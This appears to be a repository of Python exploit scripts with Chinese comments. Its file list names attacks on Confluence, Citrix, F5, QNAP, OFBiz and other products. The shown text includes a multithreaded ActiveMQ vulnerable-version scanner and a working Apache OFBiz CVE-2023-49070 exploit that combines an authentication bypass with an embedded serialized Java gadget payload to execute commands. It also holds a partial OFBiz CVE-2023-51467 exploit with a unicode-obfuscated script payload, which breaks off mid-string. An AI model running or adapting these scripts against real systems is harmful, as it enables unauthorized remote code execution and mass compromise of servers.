├── ActiveMQ_RCE_Vulnerability_Checker.py
├── Apache-OFBiz_CVE-2023-49070_Exploit.py
├── Apache-OFBiz_CVE-2023-51467_Exploit.py
├── Cellular_rce_exp.py
├── Confluence_CVE-2023-22515_Checker.py
├── Confluence_CVE-2023-22517_Exploit.py
├── Jorani_CVE-2023-26469_exp.py
├── LGSimpleEdiotr_CVE-2023-40498_exploit.py
├── Liferay_CVE-2020-7961_Exploit.py
├── Liferay_CVE-2020-7961_Exploit_v4.py
├── OwnCloud_CVE-2023-49105_Exploit.py
├── QNAP-NAS_CVE-2024-21889_Exploit.py
├── QNAP_CVE-2019-7192_Exploit.py
├── README.md
├── WiseGigaNAS_rce_exploit.py
├── WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py
├── citrix_CVE-2023-4966_exploit.py
├── f5_CVE-2023-46747_exploit.py
├── juniper-cve-2023-36845.py
└── openfire_CVE-2023-32315_exploit.py


/ActiveMQ_RCE_Vulnerability_Checker.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-10-26
 3 | 
 4 | import socket
 5 | import socks
 6 | import re
 7 | from distutils.version import StrictVersion
 8 | import argparse
 9 | import threading
10 | import warnings
11 | warnings.filterwarnings("ignore", category=DeprecationWarning)
12 | 
13 | def extract_ip_port_from_url(url):
14 |     url = url.replace("http://", "").replace("https://", "")
15 | 
16 |     parts = url.split(":")
17 |     if len(parts) == 2:
18 |         ip, port = parts[0], parts[1]
19 |         return ip, int(port)
20 |     else:
21 |         print(f"无法解析 URL：{url}")
22 |         return None, None
23 | 
24 | def check_for_vulnerability(ip, port, proxies={}, success_file=None):
25 |     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 |     sock.connect((ip, port))
27 |     sock.settimeout(10)
28 | 
29 |     try:
30 |         response_data = sock.recv(1024)
31 | 
32 |         version_match = re.search(r'ProviderVersion.*?([\d.]+)',response_data.decode('unicode_escape'))
33 | 
34 |         if version_match:
35 |             version_str = version_match.group(1)
36 |             current_version = StrictVersion(version_str)
37 | 
38 |             if (StrictVersion('5.18.0') <= current_version < StrictVersion('5.18.3')) or (current_version < StrictVersion('5.17.6')):
39 |                 with open(success_file, 'a') as s_file:
40 |                     s_file.write(f"++++++++++++++++++\n")
41 |                     s_file.write(f"目标URL: {ip}:{port}\n")
42 |                     s_file.write(f"漏洞版本: {current_version}\n\n")
43 |         else:
44 |             print(f'在 {ip}:{port} 的响应中找不到 ActiveMQ 提供程序版本')
45 |     except Exception as e:
46 |         print(f"发生异常：{e}")
47 |     finally:
48 |         sock.close()
49 | 
50 | def scan_targets(urls, proxies={}, success_file=None):
51 |     for url in urls:
52 |         url = url.strip()
53 |         ip, port = extract_ip_port_from_url(url)
54 |         if ip is not None and port is not None:
55 |             check_for_vulnerability(ip, port, proxies, success_file)
56 | 
57 | def multi_threaded_scan(urls, proxies={}, success_file=None, num_threads=4):
58 |     threads = []
59 |     for i in range(num_threads):
60 |         thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
61 |         threads.append(thread)
62 | 
63 |     for thread in threads:
64 |         thread.start()
65 | 
66 |     for thread in threads:
67 |         thread.join()
68 | 
69 | if __name__ == '__main__':
70 |     parser = argparse.ArgumentParser(description="Apache ActiveMQ (版本 < 5.18.3) 漏洞版本检测")
71 |     parser.add_argument("-u", "--url", help="目标URL")
72 |     parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
73 |     parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
74 |     args = parser.parse_args()
75 | 
76 |     if not args.url and not args.file:
77 |         print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
78 |         exit(1)
79 | 
80 |     if args.url:
81 |         urls = [args.url]
82 |     elif args.file:
83 |         with open(args.file, 'r') as file:
84 |             urls = file.readlines()
85 | 
86 |     proxies = {}
87 |     success_file = 'success_targets.txt'
88 | 
89 |     multi_threaded_scan(urls, proxies, success_file, args.threads)
90 | 
91 |     print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
92 | 


--------------------------------------------------------------------------------
/Apache-OFBiz_CVE-2023-49070_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-12-08
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 8 | 
 9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | 	try:
11 | 		vulnurl = url+"/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y"
12 | 		headers = {
13 | 			"cmd": "id"
14 | 		}
15 | 		data = '''<?xml version="1.0"?>
16 | <methodCall>
17 |   <methodName>RCE</methodName>
18 |   <params>
19 | 	<param>
20 | 	  <value>
21 | 		<struct>
22 | 		  <member>
23 | 			<name>RCE</name>
24 | 			<value>
25 | 			  <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">   rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK3K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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
26 | 			  </serializable>
27 | 			</value>
28 | 		  </member>
29 | 		</struct>
30 | 	  </value>
31 | 	</param>
32 |   </params>
33 | </methodCall>
34 | 		'''
35 | 		res = requests.post(vulnurl, headers=headers, data=data, verify=False, timeout=30)
36 | 		res.encoding = "utf-8"
37 | 		if res.status_code == 200 and "uid=" in res.text:
38 | 			print(f"目标URL: {url} ")
39 | 			with open(success_file, 'a') as s_file:
40 | 				s_file.write(f"++++++++++++++++++\n")
41 | 				s_file.write(f"目标URL: {url}\n")
42 | 				s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0]))
43 | 			return True
44 | 	except Exception as e:
45 | 		print(f"发生异常：{e}")
46 | 		return False
47 | 
48 | def scan_targets(targets, proxies=None, success_file=None):
49 | 	for target in targets:
50 | 		target = target.strip()
51 | 		check_for_vulnerability(target, proxies, success_file)
52 | 
53 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
54 | 	threads = []
55 | 
56 | 	for i in range(num_threads):
57 | 		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
58 | 		threads.append(thread)
59 | 
60 | 	for thread in threads:
61 | 		thread.start()
62 | 
63 | 	for thread in threads:
64 | 		thread.join()
65 | 
66 | if __name__ == '__main__':
67 | 	parser = argparse.ArgumentParser(description="Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070")
68 | 	parser.add_argument("-u", "--url", help="目标URL")
69 | 	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
70 | 	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
71 | 	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
72 | 	args = parser.parse_args()
73 | 
74 | 	if not args.url and not args.file:
75 | 		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
76 | 		exit(1)
77 | 
78 | 	if args.url:
79 | 		urls = [args.url]
80 | 	elif args.file:
81 | 		with open(args.file, 'r') as file:
82 | 			urls = file.readlines()
83 | 
84 | 	success_file = 'success_targets.txt'
85 | 
86 | 	proxies = {
87 | 		"http": args.proxy,
88 | 		"https": args.proxy
89 | 	} if args.proxy else None
90 | 
91 | 	multi_threaded_scan(urls, proxies, success_file, args.threads)
92 | 
93 | 	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
94 | 


--------------------------------------------------------------------------------
/Apache-OFBiz_CVE-2023-51467_Exploit.py:
--------------------------------------------------------------------------------
 1 | # 作者: VulnExpo
 2 | # 日期: 2023-12-30
 3 | 
 4 | import requests
 5 | import argparse
 6 | import threading
 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 8 | 
 9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | 	try:
11 | 		vulnurl = url+"/webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
12 | 		headers = {
13 | 			"cmd": "id",
14 | 			"Content-Type": "application/x-www-form-urlencoded",
15 | 			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
16 | 		}
17 | 		payload = {"groovyProgram": r"\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0